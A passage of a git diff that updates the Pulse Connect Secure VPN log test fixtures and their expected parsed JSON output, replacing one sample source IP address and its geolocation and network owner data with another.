15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:09.222394295Z", - "original": "Oct 19 09:11:19 pcs-node1 1 2021-10-19T09:11:19+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:19 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - User user.name denied access as the client version '9.1.11.6725' is lower than the minimum client version configured", + "ingested": "2021-12-14T14:54:26.631298306Z", + "original": "Oct 19 09:11:19 pcs-node1 1 2021-10-19T09:11:19+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:19 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - User user.name denied access as the client version '9.1.11.6725' is lower than the minimum client version configured", "category": "network", "timezone": "+02:00", "created": "2021-10-19T09:11:19.000+02:00", @@ -328,22 +340,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "Session timed out for user.name/REALM (session:sid03ac4653fd74a5ac36cffb2783be3309590f3d616617a4a7) due to inactivity (last access at 09:05:47 2021/10/19). Idle session identified during routine system scan.", "tags": [ @@ -365,26 +380,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:09.222397227Z", - "original": "Oct 19 09:16:34 pcs-node1 1 2021-10-19T09:16:34+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:16:34 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - Session timed out for user.name/REALM (session:sid03ac4653fd74a5ac36cffb2783be3309590f3d616617a4a7) due to inactivity (last access at 09:05:47 2021/10/19). Idle session identified during routine system scan.", + "ingested": "2021-12-14T14:54:26.631298671Z", + "original": "Oct 19 09:16:34 pcs-node1 1 2021-10-19T09:16:34+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:16:34 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Session timed out for user.name/REALM (session:sid03ac4653fd74a5ac36cffb2783be3309590f3d616617a4a7) due to inactivity (last access at 09:05:47 2021/10/19). Idle session identified during routine system scan.", "category": "network", "timezone": "+02:00", "created": "2021-10-19T09:16:34.000+02:00", diff --git a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-vpn.log b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-vpn.log index e0d26a99051..af18bb30ef8 100644 --- a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-vpn.log +++ b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-vpn.log @@ -1,12 +1,12 @@ -Oct 19 09:16:53 pcs-node1 1 2021-10-19T09:16:53+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:16:53 - pcs-node1 - [55.53.160.32] user.name(REALM)[] - Primary authentication successful for user.name/REALM from 55.53.160.32 -Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 55.53.160.32 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723. -Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - VPN Tunneling: Session started for user (session: sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) with IPv4 address 172.22.27.209, hostname Desktop -Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - VPN Tunneling: User with IP 172.22.27.209 connected with SSL transport mode. -Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [55.53.160.32] user.name(REALM)[] - User Limit realm restrictions successfully passed for user.name/REALM -Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [55.53.160.32] user.name(REALM)[] - Login failed. Reason: Wrong Password -Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [55.53.160.32] user.name(REALM)[] - Primary authentication failed for user.name/sign-in-page from 55.53.160.32 -Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [55.53.160.32] user.name(REALM)[] - Login failed using auth server AuthServer (Local Authentication). Reason: Failed -Oct 19 09:49:40 pcs-node1 1 2021-10-19T09:49:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:49:40 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - Closed connection to TUN-VPN port 443 after 9 seconds, with 1308 bytes read (in 1 chunks) and 1131 bytes written (in 1 chunks) (session:sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4) -Oct 19 09:49:40 pcs-node1 1 2021-10-19T09:49:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:49:40 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - VPN Tunneling: Session ended for user (session: sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4) with IPv4 address 172.22.27.209 -Oct 19 09:49:41 pcs-node1 1 2021-10-19T09:49:41+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:49:41 - pcs-node1 - [55.53.160.32] user.name()[] - Logout from 55.53.160.32 (session:sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4) -Oct 19 09:11:19 pcs-node1 1 2021-10-19T09:11:19+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:19 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - Session resumed from user agent 'Pulse-Secure/9.1.11.6725 (Windows 10) Pulse/9.1.11.6725' (session:sid9734dc3a195205ddb89cc05a9261a271201b4687ab468240). \ No newline at end of file +Oct 19 09:16:53 pcs-node1 1 2021-10-19T09:16:53+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:16:53 - pcs-node1 - [89.160.20.156] user.name(REALM)[] - Primary authentication successful for user.name/REALM from 89.160.20.156 +Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 89.160.20.156 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723. +Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - VPN Tunneling: Session started for user (session: sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) with IPv4 address 172.22.27.209, hostname Desktop +Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - VPN Tunneling: User with IP 172.22.27.209 connected with SSL transport mode. +Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [89.160.20.156] user.name(REALM)[] - User Limit realm restrictions successfully passed for user.name/REALM +Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [89.160.20.156] user.name(REALM)[] - Login failed. Reason: Wrong Password +Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [89.160.20.156] user.name(REALM)[] - Primary authentication failed for user.name/sign-in-page from 89.160.20.156 +Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [89.160.20.156] user.name(REALM)[] - Login failed using auth server AuthServer (Local Authentication). Reason: Failed +Oct 19 09:49:40 pcs-node1 1 2021-10-19T09:49:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:49:40 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Closed connection to TUN-VPN port 443 after 9 seconds, with 1308 bytes read (in 1 chunks) and 1131 bytes written (in 1 chunks) (session:sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4) +Oct 19 09:49:40 pcs-node1 1 2021-10-19T09:49:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:49:40 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - VPN Tunneling: Session ended for user (session: sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4) with IPv4 address 172.22.27.209 +Oct 19 09:49:41 pcs-node1 1 2021-10-19T09:49:41+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:49:41 - pcs-node1 - [89.160.20.156] user.name()[] - Logout from 89.160.20.156 (session:sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4) +Oct 19 09:11:19 pcs-node1 1 2021-10-19T09:11:19+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:19 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Session resumed from user agent 'Pulse-Secure/9.1.11.6725 (Windows 10) Pulse/9.1.11.6725' (session:sid9734dc3a195205ddb89cc05a9261a271201b4687ab468240). \ No newline at end of file diff --git a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-vpn.log-expected.json b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-vpn.log-expected.json index 505a9a7bd3b..2cdb6ed4baa 100644 --- a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-vpn.log-expected.json +++ b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-vpn.log-expected.json @@ -7,24 +7,27 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, - "message": "Primary authentication successful for user.name/REALM from 55.53.160.32", + "message": "Primary authentication successful for user.name/REALM from 89.160.20.156", "tags": [ "preserve_original_event" ], @@ -44,26 +47,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:10.677697843Z", - "original": "Oct 19 09:16:53 pcs-node1 1 2021-10-19T09:16:53+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:16:53 - pcs-node1 - [55.53.160.32] user.name(REALM)[] - Primary authentication successful for user.name/REALM from 55.53.160.32", + "ingested": "2021-12-14T14:54:27.270276152Z", + "original": "Oct 19 09:16:53 pcs-node1 1 2021-10-19T09:16:53+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:16:53 - pcs-node1 - [89.160.20.156] user.name(REALM)[] - Primary authentication successful for user.name/REALM from 89.160.20.156", "category": "network", "timezone": "+02:00", "created": "2021-10-19T09:16:53.000+02:00", @@ -83,24 +89,27 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, - "message": "Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 55.53.160.32 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", + "message": "Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 89.160.20.156 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", "tags": [ "preserve_original_event" ], @@ -120,26 +129,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:10.677703627Z", - "original": "Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 55.53.160.32 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", + "ingested": "2021-12-14T14:54:27.270279231Z", + "original": "Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 89.160.20.156 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", "timezone": "+02:00", "created": "2021-10-19T09:10:35.000+02:00", "kind": "event", @@ -175,22 +187,25 @@ "ip": "172.22.27.209" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "VPN Tunneling: Session started for user (session: sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) with IPv4 address 172.22.27.209, hostname Desktop", "tags": [ @@ -219,26 +234,29 @@ "ip": "172.22.27.209" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:10.677706748Z", - "original": "Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - VPN Tunneling: Session started for user (session: sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) with IPv4 address 172.22.27.209, hostname Desktop", + "ingested": "2021-12-14T14:54:27.270279691Z", + "original": "Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - VPN Tunneling: Session started for user (session: sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) with IPv4 address 172.22.27.209, hostname Desktop", "timezone": "+02:00", "created": "2021-10-19T09:10:35.000+02:00", "kind": "event", @@ -260,22 +278,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "VPN Tunneling: User with IP 172.22.27.209 connected with SSL transport mode.", "tags": [ @@ -297,26 +318,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:10.677709805Z", - "original": "Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - VPN Tunneling: User with IP 172.22.27.209 connected with SSL transport mode.", + "ingested": "2021-12-14T14:54:27.270280070Z", + "original": "Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - VPN Tunneling: User with IP 172.22.27.209 connected with SSL transport mode.", "category": "network", "timezone": "+02:00", "created": "2021-10-19T09:10:35.000+02:00", @@ -333,22 +357,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "User Limit realm restrictions successfully passed for user.name/REALM", "tags": [ @@ -370,26 +397,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:10.677712797Z", - "original": "Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [55.53.160.32] user.name(REALM)[] - User Limit realm restrictions successfully passed for user.name/REALM", + "ingested": "2021-12-14T14:54:27.270280505Z", + "original": "Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [89.160.20.156] user.name(REALM)[] - User Limit realm restrictions successfully passed for user.name/REALM", "category": "network", "timezone": "+02:00", "created": "2021-10-19T10:12:11.000+02:00", @@ -406,22 +436,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "Login failed. Reason: Wrong Password", "tags": [ @@ -443,27 +476,30 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { "reason": "Wrong Password", - "ingested": "2021-12-08T13:53:10.677715713Z", - "original": "Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [55.53.160.32] user.name(REALM)[] - Login failed. Reason: Wrong Password", + "ingested": "2021-12-14T14:54:27.270280882Z", + "original": "Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [89.160.20.156] user.name(REALM)[] - Login failed. Reason: Wrong Password", "timezone": "+02:00", "created": "2021-10-19T10:12:11.000+02:00", "kind": "event", @@ -481,24 +517,27 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, - "message": "Primary authentication failed for user.name/sign-in-page from 55.53.160.32", + "message": "Primary authentication failed for user.name/sign-in-page from 89.160.20.156", "tags": [ "preserve_original_event" ], @@ -518,26 +557,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:10.677718691Z", - "original": "Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [55.53.160.32] user.name(REALM)[] - Primary authentication failed for user.name/sign-in-page from 55.53.160.32", + "ingested": "2021-12-14T14:54:27.270281263Z", + "original": "Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [89.160.20.156] user.name(REALM)[] - Primary authentication failed for user.name/sign-in-page from 89.160.20.156", "category": "network", "timezone": "+02:00", "created": "2021-10-19T10:12:11.000+02:00", @@ -554,22 +596,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "Login failed using auth server AuthServer (Local Authentication). Reason: Failed", "tags": [ @@ -591,27 +636,30 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { "reason": "Failed", - "ingested": "2021-12-08T13:53:10.677721608Z", - "original": "Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [55.53.160.32] user.name(REALM)[] - Login failed using auth server AuthServer (Local Authentication). Reason: Failed", + "ingested": "2021-12-14T14:54:27.270281651Z", + "original": "Oct 19 10:12:11 pcs-node1 1 2021-10-19T10:12:11+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:12:11 - pcs-node1 - [89.160.20.156] user.name(REALM)[] - Login failed using auth server AuthServer (Local Authentication). Reason: Failed", "timezone": "+02:00", "created": "2021-10-19T10:12:11.000+02:00", "kind": "event", @@ -632,22 +680,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "Closed connection to TUN-VPN port 443 after 9 seconds, with 1308 bytes read (in 1 chunks) and 1131 bytes written (in 1 chunks) (session:sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4)", 